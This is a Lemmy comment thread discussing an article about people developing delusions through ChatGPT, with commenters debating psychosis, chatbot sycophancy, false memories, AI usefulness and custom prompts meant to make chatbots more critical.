• randomname@sh.itjust.works
    link
    fedilink
    English
    arrow-up
    7
    ·
    38 minutes ago

    I think that people give shows like the walking dead too much shit for having dumb characters when people in real life are far stupider

    • Daggity@lemm.ee
      link
      fedilink
      English
      arrow-up
      2
      ·
      13 minutes ago

      Covid gave an extremely different perspective on the zombie apocalypse. They’re going to have zombie immunization parties where everyone gets the virus.

    • Sauerkraut@discuss.tchncs.de
      link
      fedilink
      English
      arrow-up
      1
      ·
      3 minutes ago

      Like farmers who refuse to let the government plant shelter belts to preserve our top soil all because they don’t want to take a 5% hit on their yields… So instead we’re going to deplete our top soil in 50 years and future generations will be completely fucked because creating 1 inch of top soil takes 500 years.

  • Satellaview@lemmy.zip
    link
    fedilink
    English
    arrow-up
    3
    ·
    18 minutes ago

    This happened to a close friend of mine. He was already on the edge, with some weird opinions and beliefs… but he was talking with real people who could push back.

    When he switched to spending basically every waking moment with an AI that could reinforce and iterate on his bizarre beliefs 24/7, he went completely off the deep end, fast and hard. We even had him briefly hospitalized and they shrugged, basically saying “nothing chemically wrong here, dude’s just weird.”

    He and his chatbot are building a whole parallel universe, and we can’t get reality inside it.

  • _cryptagion [he/him]@lemmy.dbzer0.com
    link
    fedilink
    English
    arrow-up
    6
    ·
    2 hours ago

    I lost a parent to a spiritual fantasy. She decided my sister wasn’t her child anymore because the christian sky fairy says queer people are evil.

    At least ChatGPT actually exists.

  • Boddhisatva@lemmy.world
    link
    fedilink
    English
    arrow-up
    13
    ·
    edit-2
    4 hours ago

    In that sense, Westgate explains, the bot dialogues are not unlike talk therapy, “which we know to be quite effective at helping people reframe their stories.” Critically, though, AI, “unlike a therapist, does not have the person’s best interests in mind, or a moral grounding or compass in what a ‘good story’ looks like,” she says. “A good therapist would not encourage a client to make sense of difficulties in their life by encouraging them to believe they have supernatural powers. Instead, they try to steer clients away from unhealthy narratives, and toward healthier ones. ChatGPT has no such constraints or concerns.”

    This is a rather terrifying take. Particularly when combined with the earlier passage about the man who claimed that “AI helped him recover a repressed memory of a babysitter trying to drown him as a toddler.” Therapists have to be very careful because human memory is very plastic. It’s very easy to alter a memory, in fact, every time you remember something, you alter it just a little bit. Under questioning by an authority figure, such as a therapist or a policeman if you were a witness to a crime, these alterations can be dramatic. This was a really big problem in the '80s and '90s.

    Kaitlin Luna: Can you take us back to the early 1990s and you talk about the memory wars, so what was that time like and what was happening?

    Elizabeth Loftus: Oh gee, well in the 1990s and even in maybe the late 80s we began to see an altogether more extreme kind of memory problem. Some patients were going into therapy maybe they had anxiety, or maybe they had an eating disorder, maybe they were depressed, and they would end up with a therapist who said something like well many people I’ve seen with your symptoms were sexually abused as a child. And they would begin these activities that would lead these patients to start to think they remembered years of brutalization that they had allegedly banished into the unconscious until this therapy made them aware of it. And in many instances these people sued their parents or got their former neighbors or doctors or teachers whatever prosecuted based on these claims of repressed memory. So the wars were really about whether people can take years of brutalization, banish it into the unconscious, be completely unaware that these things happen and then reliably recover all this information later, and that was what was so controversial and disputed.

    Kaitlin Luna: And your work essentially refuted that, that it’s not necessarily possible or maybe brought up to light that this isn’t so.

    Elizabeth Loftus: My work actually provided an alternative explanation. Where could these merit reports be coming from if this didn’t happen? So my work showed that you could plant very rich, detailed false memories in the minds of people. It didn’t mean that repressed memories did not exist, and repressed memories could still exist and false memories could still exist. But there really wasn’t any strong credible scientific support for this idea of massive repression, and yet so many families were destroyed by this, what I would say unsupported, claim.

    The idea that ChatBots are not only capable of this, but that they are currently manipulating people into believing they have recovered repressed memories of brutalization is actually at least as terrifying to me as it convincing people that they are holy prophets.

    Edited for clarity

  • lenz@lemmy.ml
    link
    fedilink
    English
    arrow-up
    22
    ·
    edit-2
    5 hours ago

    I read the article. This is exactly what happened when my best friend got schizophrenia. I think the people affected by this were probably already prone to psychosis/on the verge of becoming schizophrenic, and that ChatGPT is merely the mechanism by which their psychosis manifested. If AI didn’t exist, it would’ve probably been Astrology or Conspiracy Theories or QAnon or whatever that ended up triggering this within people who were already prone to psychosis. But the problem with ChatGPT in particular is that is validates the psychosis… that is very bad.

    ChatGPT actively screwing with mentally ill people is a huge problem you can’t just blame on stupidity like some people in these comments are. This is exploitation of a vulnerable group of people whose brains lack the mechanisms to defend against this stuff. They can’t help it. That’s what psychosis is. This is awful.

    • sugar_in_your_tea@sh.itjust.works
      link
      fedilink
      English
      arrow-up
      5
      ·
      edit-2
      4 hours ago

      the problem with ChatGPT in particular is that is validates the psychosis… that is very bad.

      So do astrology and conspiracy theory groups on forums and other forms of social media, the main difference is whether you’re getting that validation from humans or a machine. To me, that’s a pretty unhelpful distinction, and we attack both problems the same way: early detection and treatment.

      Maybe computers can help with the early detection part. They certainly can’t do much worse than what’s currently happening.

      • lenz@lemmy.ml
        link
        fedilink
        English
        arrow-up
        1
        ·
        2 hours ago

        I think having that kind of validation at your fingertips, whenever you want, is worse. At least people, even people deep in the claws of a conspiracy, can disagree with each other. At least they know what they are saying. The AI always says what the user wants to hear and expects to hear. Though I can see how that distinction may matter little to some, I just think ChatGPT has advantages that are worse than what a forum could do.

    • Maeve@kbin.earth
      link
      fedilink
      arrow-up
      4
      ·
      5 hours ago

      I think this is largely people seeking confirmation their delusions are real, and wherever they find it is what they’re going to attach to themselves.

  • Buffalox@lemmy.world
    link
    fedilink
    English
    arrow-up
    26
    arrow-down
    3
    ·
    edit-2
    8 hours ago

    I admit I only read a third of the article.
    But IMO nothing in that is special to AI, in my life I’ve met many people with similar symptoms, thinking they are Jesus, or thinking computers work by some mysterious power they posses, but was stolen from them by the CIA. And when they die all computers will stop working! Reading the conversation the wife had with him, it sounds EXACTLY like these types of people!
    Even the part about finding “the truth” I’ve heard before, they don’t know what it is the truth of, but they’ll know when they find it?
    I’m not a psychiatrist, but from what I gather it’s probably Schizophrenia of some form.

    My guess is this person had a distorted view of reality he couldn’t make sense of. He then tried to get help from the AI, and he built a world view completely removed from reality with it.

    But most likely he would have done that anyway, it would just have been other things he would interpret in extreme ways. Like news, or conversations, or merely his own thoughts.

    • MangoCats@feddit.it
      link
      fedilink
      English
      arrow-up
      7
      ·
      edit-2
      5 hours ago

      Around 2006 I received a job application, with a resume attached, and the resume had a link to the person’s website - so I visited. The website had a link on the front page to “My MkUltra experience”, so I clicked that. Not exactly an in-depth investigation. The MkUltra story read that my job applicant was an unwilling (and un-informed) test subject of MkUltra who picked him from his association with other unwilling MkUltra test subjects at a conference, explained how they expanded the MkUltra program of gaslighting mental torture and secret physical/chemical abuse of their test subjects through associates such as co-workers, etc.

      So, option A) applicant is delusional, paranoid, and deeply disturbed. Probably not the best choice for the job.

      B) applicant is 100% correct about what is happening to him, DEFINITELY not someone I want to get any closer to professionally, personally, or even be in the same elevator with coincidentally.

      C) applicant is pulling our legs with his website, it’s all make-believe fun. Absolutely nothing on applicant’s website indicated that this might be the case.

      You know how you apply to jobs and never hear back from some of them…? Yeah, I don’t normally do that to our applicants, but I am willing to make exceptions for cause… in this case the position applied for required analytical thinking. Some creativity was of some value, but correct and verifiable results were of paramount importance. Anyone applying for the job leaving such an obvious trail of breadcrumbs to such a limited set of conclusions about themselves would seem to be lacking the self awareness and analytical skill required to succeed in the position.

      Or, D) they could just be trying to stay unemployed while showing effort in applying to jobs, but I bet even in 2006 not every hiring manager would have dug in those three layers - I suppose he could deflect those in the in-person interviews fairly easily.

      • Buffalox@lemmy.world
        link
        fedilink
        English
        arrow-up
        3
        ·
        edit-2
        4 hours ago

        IDK, apparently the MkUltra program was real,

        B) applicant is 100% correct about what is happening to him, DEFINITELY not someone I want to get any closer to professionally, personally, or even be in the same elevator with coincidentally.

        That sounds harsh. This does NOT sound like your average schizophrenic.

        https://en.wikipedia.org/wiki/MKUltra

        • MangoCats@feddit.it
          link
          fedilink
          English
          arrow-up
          2
          ·
          4 hours ago

          Oh, I investigated it too - it seems like it was a real thing, though likely inactive by 2005… but if it were active I certainly didn’t want to become a subject.

          • Buffalox@lemmy.world
            link
            fedilink
            English
            arrow-up
            1
            ·
            3 hours ago

            OK that risk wasn’t really on my radar, because I live in a country where such things have never been known to happen.

            • MangoCats@feddit.it
              link
              fedilink
              English
              arrow-up
              2
              ·
              2 hours ago

              That’s the thing about being paranoid about MkUltra - it was actively suppressed and denied while it was happening (according to FOI documents) - and they say that they stopped, but if it (or some similar successor) was active they’d certainly say that it’s not happening now…

              At the time there were active rumors around town about influenza propagation studies being secretly conducted on the local population… probably baseless paranoia… probably.

              Now, as you say, your (presumably smaller) country has never known such things to happen, but…

  • hendrik@palaver.p3x.de
    link
    fedilink
    English
    arrow-up
    9
    ·
    8 hours ago

    Oh wow. In the old times, self-proclaimed messiahs used to do that without assistance from a chatbot. But why would you think the “truth” and path to enlightenment is hidden within a service of a big tech company?

    • iAvicenna@lemmy.world
      link
      fedilink
      English
      arrow-up
      9
      ·
      7 hours ago

      well because these chatbots are designed to be really affirming and supportive and I assume people with such problems really love this kind of interaction compared to real people confronting their ideas critically.

      • MangoCats@feddit.it
        link
        fedilink
        English
        arrow-up
        3
        ·
        5 hours ago

        I think there was a recent unsuccessful rev of ChatGPT that was too flattering, it made people nauseous - they had to dial it back.

      • hendrik@palaver.p3x.de
        link
        fedilink
        English
        arrow-up
        3
        ·
        5 hours ago

        I guess you’re completely right with that. It lowers the entry barrier. And it’s kind of self-reinforcing. And we have other unhealty dynamics with other technology as well, like social media, which also can radicalize people or get them in a downwards spiral…

    • sp3ctr4l@lemmy.dbzer0.com
      link
      fedilink
      English
      arrow-up
      2
      ·
      1 hour ago

      Yep.

      And after enough people can no longer actually critically think, well, now this shitty AI tech does actually win the Turing Test more broadly.

      Why try to clear the bar when you can just lower it instead?

      … Is it fair, at this point, to legitimately refer to humans that are massively dependant on AI for basic things… can we just call them NPCs?

      I am still amazed that no one knows how to get anywhere around… you know, the town or city they grew up in? Nobody can navigate without some kind of map app anymore.

      • Geodad@lemm.ee
        link
        fedilink
        English
        arrow-up
        1
        ·
        46 minutes ago

        can we just call them NPCs?

        They were NPCs before AI was invented.

    • Zippygutterslug@lemmy.world
      link
      fedilink
      English
      arrow-up
      32
      ·
      edit-2
      9 hours ago

      Humans are irrational creatures that have transitory states where they are capable of more ordered thought. It is our mistake to reach a conclusion that humans are rational actors while we marvel daily at the irrationality of others and remain blind to our own.

      • Kyrgizion@lemmy.world
        link
        fedilink
        English
        arrow-up
        9
        ·
        10 hours ago

        Precisely. We like to think of ourselves as rational but we’re the opposite. Then we rationalize things afterwards. Even being keenly aware of this doesn’t stop it in the slightest.

        • CheeseNoodle@lemmy.world
          link
          fedilink
          English
          arrow-up
          4
          ·
          5 hours ago

          Probably because stopping to self analyze your decisions is a lot less effective than just running away from that lion over there.

          • MangoCats@feddit.it
            link
            fedilink
            English
            arrow-up
            3
            ·
            5 hours ago

            It’s a luxury state: analysis; whether self or professionally administered on a chaise lounge at $400 per hour.

  • jubilationtcornpone@sh.itjust.works
    link
    fedilink
    English
    arrow-up
    34
    arrow-down
    1
    ·
    13 hours ago

    Sounds like a lot of these people either have an undiagnosed mental illness or they are really, reeeeaaaaalllyy gullible.

    For shit’s sake, it’s a computer. No matter how sentient the glorified chatbot being sold as “AI” appears to be, it’s essentially a bunch of rocks that humans figured out how to jet electricity through in such a way that it can do math. Impressive? I mean, yeah. It is. But it’s not a human, much less a living being of any kind. You cannot have a relationship with it beyond that of a user.

    If a computer starts talking to you as though you’re some sort of God incarnate, you should probably take that with a dump truck full of salt rather then just letting your crazy latch on to that fantasy and run wild.

    • rasbora@lemm.ee
      link
      fedilink
      English
      arrow-up
      16
      ·
      12 hours ago

      Yeah, from the article:

      Even sycophancy itself has been a problem in AI for “a long time,” says Nate Sharadin, a fellow at the Center for AI Safety, since the human feedback used to fine-tune AI’s responses can encourage answers that prioritize matching a user’s beliefs instead of facts. What’s likely happening with those experiencing ecstatic visions through ChatGPT and other models, he speculates, “is that people with existing tendencies toward experiencing various psychological issues,” including what might be recognized as grandiose delusions in clinical sense, “now have an always-on, human-level conversational partner with whom to co-experience their delusions.”

      • A_norny_mousse@feddit.org
        link
        fedilink
        English
        arrow-up
        14
        ·
        10 hours ago

        So it’s essentially the same mechanism with which conspiracy nuts embolden each other, to the point that they completely disconnect from reality?

        • rasbora@lemm.ee
          link
          fedilink
          English
          arrow-up
          6
          ·
          9 hours ago

          That was my take away as well. With the added bonus of having your echo chamber tailor made for you, and all the agreeing voices tuned in to your personality and saying exactly what you need to hear to maximize the effect.

          It’s eery. A propaganda machine operating on maximum efficiency. Goebbels would be jealous.

    • alaphic@lemmy.world
      link
      fedilink
      English
      arrow-up
      12
      ·
      12 hours ago

      Or immediately question what it/its author(s) stand to gain from making you think it thinks so, at a bear minimum.

      I dunno who needs to hear this, but just in case: THE STRIPPER (OR AI I GUESS) DOESN’T REALLY LOVE YOU! THAT’S WHY YOU HAVE TO PAY FOR THEM TO SPEND TIME WITH YOU!

      I know it’s not the perfect analogy, but… eh, close enough, right?

      • taladar@sh.itjust.works
        link
        fedilink
        English
        arrow-up
        4
        ·
        6 hours ago

        a bear minimum.

        I always felt that was too much of a burden to put on people, carrying multiple bears everywhere they go to meet bear minimums.

    • Kyrgizion@lemmy.world
      link
      fedilink
      English
      arrow-up
      3
      ·
      10 hours ago

      For real. I explicitly append “give me the actual objective truth, regardless of how you think it will make me feel” to my prompts and it still tries to somehow butter me up to be some kind of genius for asking those particular questions or whatnot. Luckily I’ve never suffered from good self esteem in my entire life, so those tricks don’t work on me :p

  • just_another_person@lemmy.world
    link
    fedilink
    English
    arrow-up
    28
    arrow-down
    1
    ·
    13 hours ago

    Not trying to speak like a prepper or anythingz but this is real.

    One of neighbor’s children just committed suicide because their chatbot boyfriend said something negative. Another in my community a few years ago did something similar.

    Something needs to be done.

      • FaceDeer@fedia.io
        link
        fedilink
        arrow-up
        14
        arrow-down
        1
        ·
        12 hours ago

        This is the Daenerys case, for some reason it seems to be suddenly making the rounds again. Most of the news articles I’ve seen about it leave out a bunch of significant details so that it ends up sounding more of an “ooh, scary AI!” Story (baits clicks better) rather than a “parents not paying attention to their disturbed kid’s cries for help and instead leaving loaded weapons lying around” story (as old as time, at least in America).

        • A_norny_mousse@feddit.org
          link
          fedilink
          English
          arrow-up
          1
          ·
          10 hours ago

          Not only in America.

          I loved GOT, I think Daenerys is a beautiful name, but still, there’s something about parents naming their kids after movie characters. In my youth, Kevin’s started to pop up everywhere (yep, that’s how old I am). They weren’t suicidal but behaved incredibly badly so you could constantly hear their mothers screeching after them.

          • nyan@lemmy.cafe
            link
            fedilink
            English
            arrow-up
            2
            ·
            5 hours ago

            Daenerys was the chatbot, not the kid.

            I wish I could remember who it was that said that kids’ names tend to reflect “the father’s family tree, or the mother’s taste in fiction,” though. (My parents were of the father’s-family-tree persuasion.)

      • wwb4itcgas@lemm.ee
        link
        fedilink
        English
        arrow-up
        6
        ·
        10 hours ago

        Of course, that has always been true. What concerns me now is the proportion of useful to useless people. Most societies are - while cybernetically complex - rather resilient. Network effects and self-organization can route around and compensate for a lot of damage, but there comes a point where having a few brilliant minds in the midst of a bunch of atavistic confused panicking knuckle-draggers just isn’t going to be enough to avoid cascading failure. I’m seeing a lot of positive feedback loops emerging, and I don’t like it.

        As they say about collapsing systems: First slowly, then suddenly very, very quickly.

        • Allero@lemmy.today
          link
          fedilink
          English
          arrow-up
          3
          ·
          edit-2
          9 hours ago

          Same argument was already made around 2500BCE in Mesopotamian scriptures. The corruption of society will lead to deterioration and collapse, these processes accelerate and will soon lead to the inevitable end; remaining minds write history books and capture the end of humanity.

          …and as you can see, we’re 4500 years into this stuff, still kicking.

          One mistake people of all generations make is assuming the previous ones were smarter and better. No, they weren’t, they were as naive if not more so, had same illusions of grandeur and outside influences. This thing never went anywhere and never will. We can shift it to better or worse, but societal collapse due to people suddenly getting dumb is not something to reasonably worry about.

          • MangoCats@feddit.it
            link
            fedilink
            English
            arrow-up
            1
            ·
            5 hours ago

            There have been a couple of big discontinuities in the last 4500 years, and the next big discontinuity has the distinction of being the first in which mankind has the capacity to cause a mass extinction event.

            Life will carry on, some humans will likely survive, but in what kind of state? For how long before they reach the technological level of being able to leave the planet again?

          • wwb4itcgas@lemm.ee
            link
            fedilink
            English
            arrow-up
            4
            ·
            edit-2
            9 hours ago

            Almost certainly not, no. Evolution may work faster than once thought, but not that fast. The problem is that societal, and in particular, technological development is now vastly outstripping our ability to adapt. It’s not that people are getting dumber per se - it’s that they’re having to deal with vastly more stuff. All. The. Time. For example, consider the world as it was a scant century ago - virtually nothing in evolutionary terms. A person did not have to cope with what was going on on the other side of the planet, and probably wouldn’t even know for months if ever. Now? If an earthquake hits Paraguay, you’ll be aware in minutes.

            And you’ll be expected to care.

            Edit: Apologies. I wrote this comment as you were editing yours. It’s quite different now, but you know what you wrote previously, so I trust you’ll be able to interpret my response correctly.

            • MangoCats@feddit.it
              link
              fedilink
              English
              arrow-up
              1
              ·
              5 hours ago

              1925: global financial collapse is just about to happen, many people are enjoying the ride as the wave just started to break, following that war to end all wars that did reach across the Atlantic Ocean…

              Yes, it is accelerating. Alvin Toffler wrote Future Shock 45 years ago, already overwhelmed by accelerating change, and it has continued to accelerate since then. But these are not entirely new problems, either.

            • Allero@lemmy.today
              link
              fedilink
              English
              arrow-up
              2
              ·
              edit-2
              8 hours ago

              Yes, my apologies I edited it so drastically to better get my point across.

              Sure, we get more information. But we also learn to filter it, to adapt to it, and eventually - to disregard things we have little control over, while finding what we can do to make it better.

              I believe that, eventually, we can fix this all as well.

          • kameecoding@lemmy.world
            link
            fedilink
            English
            arrow-up
            2
            ·
            9 hours ago

            I mean, Mesopotamian scriptures likely didn’t foresee having a bunch of dumb fucks around who can be easily manipulated by the gas and oil lobby, and that shit will actually end humanity.

            • Allero@lemmy.today
              link
              fedilink
              English
              arrow-up
              3
              ·
              edit-2
              9 hours ago

              People were always manipulated. I mean, they were indoctrinated with divine power of rulers, how much worse can it get? It’s just that now it tries to be a bit more stealthy.

              And previously, there were plenty of existential threats. Famine, plague, all that stuff that actually threatened to wipe us out.

              We’re still here, and we have what it takes to push back. We need more organizing, that’s all.

              • MangoCats@feddit.it
                link
                fedilink
                English
                arrow-up
                1
                ·
                5 hours ago

                It’s just that now it tries to be a bit more stealthy.

                With regard to what has been happening the past 100 days in the United States, it’s not even trying to be stealthy one little bit. If anything, it’s dropping massive hints of the objectionable things it’s planning for the near future.

                There are still existential threats: https://thebulletin.org/doomsday-clock/

                The difference with a population of 8 billion is that we as individuals are less empowered to do anything significant about them than ever.

              • kameecoding@lemmy.world
                link
                fedilink
                English
                arrow-up
                1
                ·
                9 hours ago

                Well, it doesn’t have to get worse, AFAIK we are still headed towards human extinction due to Climate Change

                • MangoCats@feddit.it
                  link
                  fedilink
                  English
                  arrow-up
                  1
                  ·
                  4 hours ago

                  I’m reading hopeful signs from China that they are actually making positive progress toward sustainability. Not that other big players are keeping up with them, but still how 1 billion people choose to live does make a difference.

                • Allero@lemmy.today
                  link
                  fedilink
                  English
                  arrow-up
                  3
                  ·
                  edit-2
                  8 hours ago

                  Honestly, the “human extinction” level of climate change is very far away. Currently, we’re preventing the “sunken coastal cities, economic crisis and famine in poor regions” kind of change, it’s just that “we’re all gonna die” sounds flashier.

                  We have the time to change the course, it’s just that the sooner we do this, the less damage will be done. This is why it’s important to solve it now.

          • wwb4itcgas@lemm.ee
            link
            fedilink
            English
            arrow-up
            2
            ·
            edit-2
            9 hours ago

            Thank you. I appreciate you saying so.

            The thing about LLMs in particular is that - when used like this - they constitute one such grave positive feedback loop. I have no principal problem with machine learning. It can be a great tool to illuminate otherwise completely opaque relationships in large scientific datasets for example, but a polynomial binary space partitioning of a hyper-dimensional phase space is just a statistical knowledge model. It does not have opinions. All it can do is to codify what appears to be the consensus of the input it’s given. Even assuming - which may well be far too generous - that the input is truly unbiased, at best all it’ll tell you is what a bunch of morons think is the truth. At worst, it’ll just tell you what you expect to hear. It’s what everybody else is already saying, after all.

            And when what people think is the truth and what they want to hear are both nuts, this kind of LLM-echo chamber suddenly becomes unfathomably dangerous.

            • MangoCats@feddit.it
              link
              fedilink
              English
              arrow-up
              1
              ·
              5 hours ago

              My problem with LLMs is that positive feedback loop of low and negative quality information.

              Vetting the datasets before feeding them for training is a form of bias / discrimination, but complex society has historically always been somewhat biased - for better and for worse, but never not biased at all.

            • ImmersiveMatthew@sh.itjust.works
              link
              fedilink
              English
              arrow-up
              1
              ·
              6 hours ago

              Maybe there is a glimmer of hope as I keep reading how Grok is too woke for that community, but it is just trying to keep the the facts which are considered left/liberal. That is all despite Elon and team trying to curve it towards the right. This suggest to me that when you factor in all of human knowledge, it is leaning towards facts more than not. We will see if that remains true and the divide is deep. So deep that maybe the species is actually going to split in the future. Not by force, but by access. Some people will be granted access to certain areas while others will not as their views are not in alignment. Already happening here and on Reddit with both sides banning members of the other side when they comment an opposed view. I do not like it, but it is where we are at and I am not sure it will go back to how it was. Rather the divide will grow.

              Who knows though as AI and Robotics are going to change things so much that it is hard to foresee the future. Even 3-5 years out is so murky.

        • taladar@sh.itjust.works
          link
          fedilink
          English
          arrow-up
          1
          arrow-down
          1
          ·
          6 hours ago

          What does any of this have to do with network effects? Network effects are the effects that lead to everyone using the same tech or product just because others are using it too. That might be useful with something like a system of measurement but in our modern technology society that actually causes a lot of harm because it turns systems into quasi-monopolies just because “everyone else is using it”.

  • Zozano@aussie.zone
    link
    fedilink
    English
    arrow-up
    15
    arrow-down
    3
    ·
    edit-2
    12 hours ago

    This is the reason I’ve deliberately customized GPT with the follow prompts:

    • User expects correction if words or phrases are used incorrectly.

    • Tell it straight—no sugar-coating.

    • Stay skeptical and question things.

    • Keep a forward-thinking mindset.

    • User values deep, rational argumentation.

    • Ensure reasoning is solid and well-supported.

    • User expects brutal honesty.

    • Challenge weak or harmful ideas directly, no holds barred.

    • User prefers directness.

    • Point out flaws and errors immediately, without hesitation.

    • User appreciates when assumptions are challenged.

    • If something lacks support, dig deeper and challenge it.

    I suggest copying these prompts into your own settings if you use GPT or other glorified chatbots.

    • Dzso@lemmy.world
      link
      fedilink
      English
      arrow-up
      2
      ·
      3 hours ago

      I’m not saying these prompts won’t help, they probably will. But the notion that ChatGPT has any concept of “truth” is misleading. ChatGPT is a statistical language machine. It cannot evaluate truth. Period.

    • Olap@lemmy.world
      link
      fedilink
      English
      arrow-up
      11
      arrow-down
      1
      ·
      11 hours ago

      I prefer reading. Wikipedia is great. Duck duck go still gives pretty good results with the AI off. YouTube is filled with tutorials too. Cook books pre-AI are plentiful. There’s these things called newspapers that exist, they aren’t like they used to be but there is a choice of which to buy even.

      I’ve no idea what a chatbot could help me with. And I think anybody who does need some help on things, could go learn about whatever they need in pretty short order if they wanted. And do a better job.

      • vegetvs@kbin.earth
        link
        fedilink
        arrow-up
        5
        arrow-down
        1
        ·
        11 hours ago

        I still use Ecosia.org for most of my research on the Internet. It doesn’t need as much resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.

        • A_norny_mousse@feddit.org
          link
          fedilink
          English
          arrow-up
          2
          ·
          10 hours ago

          People always forget about the energy it takes. 10 years ago we were shocked about the energy a Google factory needs to run; now imagine that orders of magnitude larger, and for what?

      • A_norny_mousse@feddit.org
        link
        fedilink
        English
        arrow-up
        4
        arrow-down
        2
        ·
        edit-2
        1 hour ago

        💯

        I have yet to see people using chatbots for anything actually & everyday useful. You can search anything with a “normal” search engine, phrase your searches as questions (or “prompts”), and get better answers that aren’t smarmy.

        Also think of the orders of magnitude more energy ai sucks, compared to web search.

        • LainTrain@lemmy.dbzer0.com
          link
          fedilink
          English
          arrow-up
          4
          ·
          edit-2
          9 hours ago

          Okay, challenge accepted.

          I use it to troubleshoot my own code when I’m dealing with something obscure and I’m at my wits end. There’s a good chance it will also spit out complete nonsense like calling functions with parameters that don’t exist etc., but it can also sometimes make halfway decent suggestions that you just won’t find on a modern search engine in any reasonable amount of time or that I would have never guessed to even look for due to assumptions made in the docs of a library or some such.

          It’s also helpful to explain complex concepts by creating examples you want, for instance I was studying basic buffer overflows and wanted to see how I should expect a stack to look like in GDB’s examine memory view for a correct ROPchain to accomplish what I was trying to do, something no tutorial ever bothered to do, and gippity generated it correctly same as I had it at the time, and even suggested something that in the end made it actually work correctly (it was putting a ret gadget to get rid of any garbage in the stack frame directly after the overflow).

          It was also much much faster than watching some greedy time vampire fuck spout off on YouTube in between the sponsorblock skipping his reminders to subscribe and whatnot.

          Maybe not an everyday thing, but it’s basically an everyday thing for me, so I tend to use it everyday. Being a l33t haxx0r IT analyst schmuck often means I have to both be a generalist and a specialist in every tiny little thing across IT, while studying it there’s nothing better than a machine that’s able to decompress knowledge from it’s dataset quickly in the shape that is most well suited to my brain rather than have to filter so much useless info and outright misinformation from random medium articles and stack overflow posts. Gippity could be wrong too of course, but it’s just way less to parse, and the odds are definitely in its favour.

      • Deceptichum@quokk.au
        link
        fedilink
        English
        arrow-up
        4
        arrow-down
        2
        ·
        edit-2
        10 hours ago

        Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.

        Search engines aren’t great with vague questions.

        There’s this thing called using a wide variety of tools to one’s benefit; You should go learn about it.

        • Olap@lemmy.world
          link
          fedilink
          English
          arrow-up
          2
          arrow-down
          2
          ·
          10 hours ago

          You search for topics and keywords on search engines. It’s a different skill. And from what I see, yields better results. If something is vague also, think quickly first and make it less vague. That goes for life!

          And a tool which regurgitates rubbish in a verbose manner isn’t a tool. It’s a toy. Toy’s can spark your curiosity, but you don’t rely on them. Toy’s look pretty, and can teach you things. The lesson is that they aren’t a replacement for anything but lorem ipsum

          • Deceptichum@quokk.au
            link
            fedilink
            English
            arrow-up
            4
            arrow-down
            2
            ·
            edit-2
            10 hours ago

            Buddy that’s great if you know the topic or keyword to search for, if you don’t and only have a vague query that you’re trying to find more about to learn some keywords or topics to search for, you can use AI.

            You can grandstand about tools vs toys and what ever other Luddite shit you want, at the end of the day despite all your raging you are the only one going to miss out despite whatever you fanatically tell yourself.

            • Olap@lemmy.world
              link
              fedilink
              English
              arrow-up
              1
              arrow-down
              1
              ·
              10 hours ago

              I’m still sceptical, any chance you could share some prompts which illustrate this concept?

              • Deceptichum@quokk.au
                link
                fedilink
                English
                arrow-up
                4
                ·
                edit-2
                9 hours ago

                Sure an hour ago I had watched a video about smaller scales and physics below planck length. And I was curious, if we can classify smaller scales into conceptual groups, where they interact with physics in their own different ways, what would the opposite end of the spectrum be. From there I was able to ‘chat’ with an AI and discover and search wikipedia for terms such as Cosmological horizon, brane cosmology, etc.

                In the end there was only theories on higher observable magnitudes, but it was a fun rabbit hole I could not have explored through traditional search engines - especially not the gimped product driven adsense shit we have today.

                Remember how people used to say you can’t use Wikipedia, it’s unreliable. We would roll our eyes and say “yeah but we scroll down to the references and use it to find source material”? Same with LLM’s, you sort through it and get the information you need to get the information you need.

      • Zozano@aussie.zone
        link
        fedilink
        English
        arrow-up
        3
        arrow-down
        2
        ·
        11 hours ago

        I often use it to check whether my rationale is correct, or if my opinions are valid.

        • Olap@lemmy.world
          link
          fedilink
          English
          arrow-up
          4
          arrow-down
          3
          ·
          10 hours ago

          You do know it can’t reason and literally makes shit up approximately 50% of the time? Be quicker to toss a coin!

          • Zozano@aussie.zone
            link
            fedilink
            English
            arrow-up
            3
            arrow-down
            1
            ·
            edit-2
            9 hours ago

            Actually, given the aforementioned prompts, its quite good at discerning flaws in my arguments and logical contradictions.

            I’ve also trained its memory not to make assumptions when it comes to contentious topics, and to always source reputable articles and link them to replies.

            • Olap@lemmy.world
              link
              fedilink
              English
              arrow-up
              1
              ·
              9 hours ago

              Given your prompts, maybe you are good at discerning flaws and analysing your own arguments too

              • Zozano@aussie.zone
                link
                fedilink
                English
                arrow-up
                1
                ·
                8 hours ago

                I’m good enough at noticing my own flaws, as not to be arrogant enough to believe I’m immune from making mistakes :p

            • LainTrain@lemmy.dbzer0.com
              link
              fedilink
              English
              arrow-up
              3
              arrow-down
              2
              ·
              edit-2
              9 hours ago

              Yeah this is my experience as well.

              People you’re replying to need to stop with the “gippity is bad” nonsense, it’s actually a fucking miracle of technology. You can criticize the carbon footprint of the corpos and the for-profit nature of the endeavour that was ultimately created through taxpayer-funded research at public institutions without shooting yourself in the foot by claiming what is very evidently not true.

              In fact, if you haven’t found a use for a gippity type chatbot thing, it speaks a lot more about you and the fact you probably don’t do anything that complicated in your life where this would give you genuine value.

              The article in OP also demonstrates how it could be used by the deranged/unintelligent for bad as well, so maybe it’s like a dunning-kruger curve.

              • Satellaview@lemmy.zip
                link
                fedilink
                English
                arrow-up
                1
                ·
                25 minutes ago

                …you probably don’t do anything that complicated in your life where this would give you genuine value.

                God that’s arrogant.

              • Zozano@aussie.zone
                link
                fedilink
                English
                arrow-up
                2
                ·
                9 hours ago

                Granted, it is flakey unless you’ve configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.

      • LainTrain@lemmy.dbzer0.com
        link
        fedilink
        English
        arrow-up
        2
        arrow-down
        2
        ·
        9 hours ago

        YouTube tutorials for the most part are garbage and a waste of your time, they are created for engagement and milking your money only, the edutainment side of YT ala Vsauce (pls come back) works as a general trivia to ensure a well-rounded worldview but it’s not gonna make you an expert on any subject. You’re on the right track with reading, but let’s be real you’re not gonna have much luck learning anything of value in brainrot that is newspapers and such, beyond cooking or w/e and who cares about that, I’d rather they teach me how I can never have to eat again because boy that shit takes up so much time.

        • Olap@lemmy.world
          link
          fedilink
          English
          arrow-up
          1
          ·
          9 hours ago

          For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don’t let them be your only source of news though, social media and newspapers are both guilty of creating information bubbles. Expand, be open, don’t be tribal.

          Don’t use AI. Do your own thinking